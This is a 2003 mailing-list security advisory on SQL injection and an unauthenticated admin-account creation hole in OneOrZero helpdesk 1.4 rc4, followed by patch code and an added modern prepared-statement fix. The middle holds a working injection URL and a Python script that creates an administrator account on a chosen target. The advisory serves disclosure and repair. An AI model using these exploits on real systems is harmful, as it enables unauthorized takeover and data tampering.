[VulnWatch] OneOrZero Security Problems (PHP)

From: Frog Man (leseulfrog_at_hotmail.com)
Date: 05/15/03

    To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org
    Date: Thu, 15 May 2003 19:06:40 +0200
    
    

    Information :
    -------------
    Website : http://www.oneorzero.com
    Version : 1.4 rc4
    Problems :
    - SQL Injection
    - Admin Access

    PHP Code/Location :
    -------------------

    supporter/tupdate.php :

    --------------------------------------------------------------------------
    if($groupid == 'change'){
            $sql = "UPDATE $mysql_tickets_table set groupid=$sg where id=$id";
            $result = $db->query($sql);
    }
    --------------------------------------------------------------------------

    admin/install.php :

    ----------------------------------------------------------------------------------------------------------------------------

    [...]
    if($step == 2){

            echo "<br><br>";
            start("Helpdesk Installation", "center");
                    if($HTTP_POST_VARS['first'] == ''){
                            showError("first name");
                            $flag = 1;
                    }
                    if($HTTP_POST_VARS['last'] == ''){
                            showError("last name");
                            $flag = 1;
                    }
                    if($HTTP_POST_VARS['user'] == ''){
                            showError("user name");
                            $flag = 1;
                    }
                    if($HTTP_POST_VARS['email'] == ''){
                            showError("email address");
                            $flag = 1;
                    }
                    if($HTTP_POST_VARS['pwd1'] == '' || $HTTP_POST_VARS['pwd2'] == ''){
                            showError("password");
                            $flag = 1;
                    }
                    if($HTTP_POST_VARS['office'] == ''){
                            showError("office");
                            $flag = 1;
                    }

                    if (!checkPwd($HTTP_POST_VARS['pwd1'], $HTTP_POST_VARS['pwd2'])){
                            showError("password");
                            $flag = 1;
                    }

                    if(!validEmail($HTTP_POST_VARS['email'])){
                            showError("email");
                            $flag = 1;
                    }

            if($flag == 1){
                    endit();
                    exit;
            }
    [...]
            $pwd = md5($HTTP_POST_VARS['pwd1']);
            $query = "INSERT IGNORE into $mysql_users_table VALUES(NULL,
    '".$HTTP_POST_VARS['first']."', '".$HTTP_POST_VARS['last']."',
    '".$HTTP_POST_VARS['user']."', '".$HTTP_POST_VARS['email']."', '',
    '".$pwd."', '".$HTTP_POST_VARS['office']."', '".$HTTP_POST_VARS['phone']."',
    1, 1, 1, 'default', null, null, null, 0, 'English', '0')";
            $db->query($query);
    [...]

    ----------------------------------------------------------------------------------------------------------------------------

    Exploits :
    ----------
    -
    http://[target]/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10
    will change the description of ticket number 10 to "abcd"
    (char(97,98,99,100))

    - To exploit the second one, in Python 2.2 :

    --------------------------------------------------------------------------------------------------------------------------
    import urlparse
    import httplib
    import string

    class OneOrZero:
        def __init__(self,target,port,user,password):
            # socket.connect() needs an integer port, not a string
            if port != "":
                self.port=int(port)
            else :
                self.port=80
            self.path=str(urlparse.urlparse(target)[2])
            self.target=str(urlparse.urlparse(target)[1])
            self.user=str(user)
            self.password=str(password)
            self.USER_AGENT='OneOrZero.py'
            self.CreateAdminAccount()

        def CreateAdminAccount(self):
            # Same form fields the step-2 installer expects (see admin/install.php above)
            data='step=2&first=admin&last=admin&user='+self.user+'&pwd1='+self.password+'&pwd2='+self.password+'&email=a@a.a&office=abcd'

            try :
                print "Connecting On "+self.target+"...\n"

                http=httplib.HTTP(self.target,self.port)

                print "Sending Data On "+self.target+"...\n"

                http.putrequest("POST",self.path+"/admin/install.php")
                http.putheader("Content-Type","application/x-www-form-urlencoded")
                http.putheader("User-Agent",self.USER_AGENT)
                http.putheader("Host",self.target)
                http.putheader("Content-Length",str(len(data)))
                http.endheaders()

                http.send(data)

                code,msg,headers = http.getreply()

                print "HTTP Code : ",str(code)
                print "HTTP Connection : ",msg
                print "HTTP headers : \n",headers,"\n"

                file=http.getfile()
                if string.find(file.read(),"Administrator Account Created Successfully.") != -1:
                    print "Congratulations, Administrator Account Created Successfully."
                    print "You Can Log In Here : http://"+self.target+self.path+"/admin/control.php"
                    print "User : ",self.user
                    print "Password : ",self.password
                else :
                    print "Administrator Account Hasn't Been Created."

            except :
                print "Error During Admin Account Creation."

    # The class must be defined before it is used, so the call comes last
    OneOrZero("http://www.target.com","80","NewUserName","NewPassword")
    --------------------------------------------------------------------------------------------------------------------------

    You just have to change the line :
    OneOrZero("http://www.target.com","80","NewUserName","NewPassword")

    Solution :
    ----------
    A patch (and more details in French) can be found on
    http://www.phpsecure.info.

    - In supporter/tupdate.php, add the following lines (at the beginning) :

    -------------------------------------------------------------------------------------------------
    foreach ($_REQUEST as $key=>$value) {

        if (get_magic_quotes_gpc()==0) {
            $value = addslashes($value); // This reproduces the option magic_quotes_gpc=1
        }

        // Breaks SQL function calls such as char(...) in any request value
        $value = str_replace('(','()',$value);

        // Overwrite the register_globals copy and every input array
        ${$key} = $value;
        $_REQUEST[$key] = $value;
        if (isset($_POST[$key])) { $_POST[$key] = $value; }
        if (isset($_COOKIE[$key])) { $_COOKIE[$key] = $value; }
        if (isset($_FILES[$key])) { $_FILES[$key] = $value; } // superglobal is $_FILES, not $_FILE
        if (isset($_GET[$key])) { $_GET[$key] = $value; }
        if (isset($HTTP_POST_VARS[$key])) { $HTTP_POST_VARS[$key] = $value; }
        if (isset($HTTP_COOKIE_VARS[$key])) { $HTTP_COOKIE_VARS[$key] = $value; }
        if (isset($HTTP_POST_FILES[$key])) { $HTTP_POST_FILES[$key] = $value; } // old name is $HTTP_POST_FILES
        if (isset($HTTP_GET_VARS[$key])) { $HTTP_GET_VARS[$key] = $value; }
    }
    -------------------------------------------------------------------------------------------------

    - In admin/install.php, insert the following lines :

    ---------------------------------------------------------------
            $sql = "SELECT * FROM $mysql_users_table WHERE id > 0";
            $result = $db->query($sql);
            $num_rows = $db->num_rows($result);
            if ($num_rows > 0){
                    die("<b>OneOrZero Is Already Installed.</b>");
            }
    ---------------------------------------------------------------

    just after :

    ---------------
    if($step == 2){
    ---------------

    frog-m@n

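As an added example (not code from the advisory, from OneOrZero, or from the phpsecure.info patch), the two vulnerable spots above rewritten defensively in modern PHP with prepared statements; it assumes a connected mysqli object in $db and the $mysql_tickets_table / $mysql_users_table names the advisory uses.

```php
<?php
// Assumed: $db is a connected mysqli instance; table names come from the
// application's configuration, never from the request.

// supporter/tupdate.php: the original built "UPDATE ... set groupid=$sg where id=$id"
// from raw request values, so sg=groupid,description=... rewrote other columns.
// Both values are numeric ids: reject anything else, then bind them as parameters.
function updateTicketGroup(mysqli $db, string $table, $sg, $id): bool {
    if (!ctype_digit((string)$sg) || !ctype_digit((string)$id)) {
        return false;           // not a positive integer: refuse without querying
    }
    $sg = (int)$sg;
    $id = (int)$id;
    $stmt = $db->prepare("UPDATE `$table` SET groupid = ? WHERE id = ?");
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('ii', $sg, $id);
    $ok = $stmt->execute();
    $affected = $stmt->affected_rows;
    $stmt->close();
    return $ok && $affected === 1; // exactly one ticket changed
}

// admin/install.php: step 2 created a new administrator on every request.
// Refuse to run the installer once any user account exists (the advisory's guard).
function installerAlreadyRan(mysqli $db, string $usersTable): bool {
    $res = $db->query("SELECT COUNT(*) AS n FROM `$usersTable`");
    if ($res === false) {
        return true;            // fail closed if the table cannot be read
    }
    $row = $res->fetch_assoc();
    return (int)$row['n'] > 0;
}

// Read inputs explicitly instead of relying on register_globals.
if (($_GET['groupid'] ?? '') === 'change') {
    updateTicketGroup($db, $mysql_tickets_table, $_GET['sg'] ?? '', $_GET['id'] ?? '');
}

if (($_POST['step'] ?? '') == 2 && installerAlreadyRan($db, $mysql_users_table)) {
    http_response_code(403);
    die('OneOrZero is already installed.');
}
```

The installer's INSERT should likewise bind the POST fields as parameters and store a password_hash() digest rather than md5(); removing or renaming admin/install.php after setup removes the attack surface entirely.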

